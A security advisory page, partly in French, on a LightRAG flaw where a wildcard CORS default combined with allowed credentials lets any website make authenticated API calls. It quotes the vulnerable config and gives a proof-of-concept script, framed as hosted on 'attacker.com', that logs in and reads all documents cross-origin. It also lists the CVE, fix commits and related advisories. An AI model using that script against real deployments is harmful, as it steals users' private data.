Résumé
LightRAG: CORS Wildcard + Credentials Enables Any-Origin Credentialed Requests
Détails de l’avis
Summary
The server defaults to CORS_ORIGINS=* combined with allow_credentials=True. Starlette's CORSMiddleware echoes the requesting origin in preflight responses when credentials are enabled, meaning every origin is effectively whitelisted for credentialed cross-origin requests. Any malicious website can perform authenticated API calls on behalf of a logged-in user.
Details
# lightrag/api/config.py:639
args.cors_origins = get_env_value("CORS_ORIGINS", "*") # default wildcard
# lightrag/api/lightrag_server.py:1379
app.add_middleware(
CORSMiddleware,
allow_origins=["*"], # any origin
allow_credentials=True, # credentials — PROBLEM with wildcard
allow_methods=["*"],
allow_headers=["*"],
)
# Starlette CORSMiddleware (confirmed in source):
# preflight_explicit_allow_origin = not allow_all_origins or allow_credentials
# = not True or True = True → echoes the requesting origin back, not "*"
# Result: every origin receives Access-Control-Allow-Credentials: true
PoC
Host on any origin. Open in browser where user is logged in to LightRAG:
<!-- attacker.com/steal.html -->
<script>
const TARGET = "http://lightrag-server:9621";
(async () => {
// Get victim token (or re-use existing session)
const r1 = await fetch(`${TARGET}/login`, {
method: "POST", credentials: "include",
headers: {"Content-Type": "application/x-www-form-urlencoded"},
body: "username=victim&password=known_pass"
});
const { access_token } = await r1.json();
// Exfiltrate all documents
const docs = await (await fetch(`${TARGET}/documents`, {
credentials: "include",
headers: { Authorization: `Bearer ${access_token}` }
})).json();
console.log("STOLEN DOCS:", docs);
})();
</script>
Impact
Permissive cross-domain policy (CWE-942). Any website visited by an authenticated LightRAG user can silently make authenticated API requests, exfiltrating all documents and knowledge graph data or performing destructive actions such as deleting the entire document store.
Références
- https://github.com/advisories/GHSA-6x6h-qqr7-855w
- https://github.com/HKUDS/LightRAG/security/advisories/GHSA-6x6h-qqr7-855w
- https://nvd.nist.gov/vuln/detail/CVE-2026-61736
- https://github.com/HKUDS/LightRAG/pull/3317
- https://github.com/HKUDS/LightRAG/commit/09567a4c983f580050db63569dd477122c058c3d
- https://github.com/HKUDS/LightRAG/commit/df68d75f9dc29dd340ffb6794b48f48c4fdc9a2d
- https://github.com/HKUDS/LightRAG/commit/ebba6548639c0f2e8919100eff76b401f1222252
- https://github.com/HKUDS/LightRAG/releases/tag/v1.5.4
Vulnérabilités liées
Tout Supply chain →- MEDIUMCVE-2026-68517
Glances: REST API CORS Credentials Guard Uses Exact-Match Instead of Membership Test — Bypassed by Any Multi-Origin Allowlist Containing the Wildcard
- HIGHCVE-2026-70604
Electron: Custom protocol with supportFetchAPI but not corsEnabled allows cross-origin reads
- MEDIUMCVE-2026-54753
`nx graph` dev server permissive CORS policy
- MEDIUMCVE-2026-53656
FiftyOne App server uses wildcard CORS (Access-Control-Allow-Origin: *), enabling cross-origin reads of local server data
- HIGHGHSA-7q9c-hpx7-9cwm
TypeSpec: Unauthenticated Remote Shutdown of Spector Mock Server via POST /.admin/stop
- CRITICALCVE-2026-73842
OpenChoreo: cluster-gateway internal proxy performs no caller authentication and is not read-only — data-plane Secret disclosure and arbitrary Kubernetes mutation